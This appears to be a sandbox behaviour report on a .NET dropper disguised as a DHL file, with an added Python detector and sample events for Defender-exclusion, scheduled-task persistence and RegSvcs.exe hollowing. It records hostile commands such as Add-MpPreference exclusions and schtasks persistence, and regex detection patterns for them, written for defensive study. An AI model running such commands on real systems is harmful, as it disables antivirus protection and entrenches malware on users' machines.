Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
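The process-creation list above is the part of the report a detection engineer cares about most: the dropper writes a copy to AppData\Roaming, runs powershell.exe twice with Add-MpPreference -ExclusionPath for its own paths, registers a scheduled task from an XML file in the user's Temp directory, and then starts RegSvcs.exe (a signed .NET framework binary) with no arguments, which is the hollowing target the injection signatures refer to. The following is an added example, not part of the Joe Sandbox report or of any vendor tooling: a small Python detector run over constructed process-creation records modelled on the command lines above, plus two benign controls a naive substring match would also flag. The ProcEvent record and its field names are assumptions for illustration; real Sysmon Event ID 1 or EDR telemetry carries the same three fields under other names.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style). Assumed field names."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events, modelled on the command lines in the report above,
# followed by two benign controls that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\DHL_231437894819.bat.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"'),
    ProcEvent(r"C:\Users\user\Desktop\DHL_231437894819.bat.exe",
              r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"'),
    ProcEvent(r"C:\Users\user\Desktop\DHL_231437894819.bat.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    # Benign: an admin shell importing a task definition from a non-temp location.
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'),
    # Benign: RegSvcs.exe used for its real purpose, with an assembly argument.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" C:\Dev\MyService.dll'),
]

# Paths an unprivileged user can write to; a parent living there is the key context.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# Defender exclusion being added or replaced via the MpPreference cmdlets.
MP_EXCLUSION = re.compile(r"\b(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I)
# schtasks /Create ... /XML <file>; group 1 is the XML path.
SCHTASKS_XML = re.compile(r'/Create\b.*?/XML\s+"?([^"\s]+)', re.I)
# Signed .NET binaries commonly hollowed by this family when started without arguments.
DOTNET_HOSTS = ("regsvcs.exe", "regasm.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _no_arguments(command_line: str, image_name: str) -> bool:
    """True when the command line is only the (possibly quoted) image path."""
    return command_line.strip().strip('"').lower().endswith(image_name)


def detect(events):
    """Return (rule_name, event) pairs for the three behaviours in the chain."""
    hits = []
    for ev in events:
        img = _basename(ev.image)
        if img == "powershell.exe" and MP_EXCLUSION.search(ev.command_line):
            hits.append(("defender_exclusion_added", ev))
        elif img == "schtasks.exe":
            m = SCHTASKS_XML.search(ev.command_line)
            if m and TEMP_DIR.search(m.group(1)):
                hits.append(("schtasks_xml_from_temp", ev))
        elif (img in DOTNET_HOSTS and _no_arguments(ev.command_line, img)
              and USER_WRITABLE.search(ev.parent_image)):
            hits.append(("dotnet_host_spawned_without_args", ev))
    return hits


if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS):
        print(f"{name}: {ev.parent_image} -> {ev.command_line}")
```

The third rule deliberately requires both an argument-less RegSvcs.exe and a parent under a user-writable directory, since RegSvcs.exe with an assembly path from a developer's shell is normal. On a live host the same two artefacts can be confirmed directly: `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists Defender path exclusions, and `schtasks /Query /TN "Updates\uvbIwIYe" /XML` dumps the registered task so its Exec action can be compared with the dropped file in AppData\Roaming.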
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Automated click: OK
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: DHL_231437894819.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL_231437894819.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: DHL_231437894819.bat.exe, ServerForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: uvbIwIYe.exe.0.dr, ServerForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.cs | .Net Code: SgLP65eFbw System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL_231437894819.bat.exe.3c14468.2.raw.unpack, MainForm.cs | .Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.cs | .Net Code: SgLP65eFbw System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.cs | .Net Code: SgLP65eFbw System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Code function: 0_2_076E5231 push E00516D5h; retf 0_2_076E523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01170C45 push ebx; retf 10_2_01170C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01170C6D push edi; retf 10_2_01170C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_01170CCC push edi; retf 10_2_01170C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 16_2_01270C6D push edi; retf 16_2_01270C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 16_2_01270C45 push ebx; retf 16_2_01270C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 16_2_01270CCB push edi; retf 16_2_01270C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 16_2_06B24645 push 0406BADAh; iretd 16_2_06B2465D
Source: DHL_231437894819.bat.exe | Static PE information: section name: .text entropy: 7.686508878932828
Source: uvbIwIYe.exe.0.dr | Static PE information: section name: .text entropy: 7.686508878932828
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, CnHZ4nFFSQNWoh3XZ8.cs | High entropy of concatenated method names: 'FyU1aFkFU0', 'QIS1uFrEFY', 'O9N1RvRem0', 'FKm1JfZo3P', 'u6y1QFBqmk', 'D201HAmFoB', 'yiV13VNhao', 'u8C1IO7QKW', 'mo91oaFZbe', 'Ucv1M6RIRy'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, wFDKFK56TvYPu3IEkr.cs | High entropy of concatenated method names: 'Kfxi89qKIN', 'WNWixqV2Z9', 'RQOLEIEgTm', 'GPbLDOkn0L', 'r3AiMFMNhO', 'RwTinRxZ5I', 'GWSiFbfnDW', 'nUbid4PvRG', 'NegiSMJoyN', 'DTVi78I0nB'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, lLKHiUlsR6De2UuAF1.cs | High entropy of concatenated method names: 'YBakRNOPaQ', 'DaukJbEAUl', 'wDnk0TKhjW', 'jnCkQodEp2', 'Cj4kHHATFv', 'qoIkNddcYK', 'CGXk3qq9B1', 'WRQkIMDicx', 'F8akWvhJbr', 'GstkobW4sQ'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, eBMXbAdtYlyGT360Ka.cs | High entropy of concatenated method names: 'WBueolGTnN', 'qmhenslU1d', 'OgxedC0jy4', 'UlSeS0CRYf', 'qRDeJmjTD5', 'GUce0QwuRC', 'MHneQu87AB', 'OPHeHJavFc', 'U9yeNsQO2l', 'kIle3JH6Y4'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, OcHrdeaLLWK7BX0qEn.cs | High entropy of concatenated method names: 'Q1MGdCYbli', 'MqGGSNagVO', 'S3QG7hA5em', 'bmGGZPgyVZ', 'npWGj37gLJ', 'cXbG56fCaU', 'EN0G4YnHpo', 'JZIG8cFtHt', 'gnUGl4EnyR', 'miXGxpo3OY'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, ATQ7dwDXSlfahW1odIE.cs | High entropy of concatenated method names: 'ToString', 'VXPOapDbcq', 'lYiOuVHyLF', 'sSOOwRdCuG', 'HBbOR2wKSC', 'WhpOJTYKWa', 'hRdO0Flhle', 'qyHOQ5AKJq', 'WVBKxJdqLurNUuUiwhQ', 'TCdtJxdu9V8gyh8Igm6'
Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, hqeXMWDEKGoWC5nrtyW.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pFACMq8xA9', 'AVUCnf60aI', 'CqMCFZVdLK', 'Xq9CdZbskc', 'R1MCSiRIyh', 'Xm0C7821wE', 'PmPCZbPZgy'
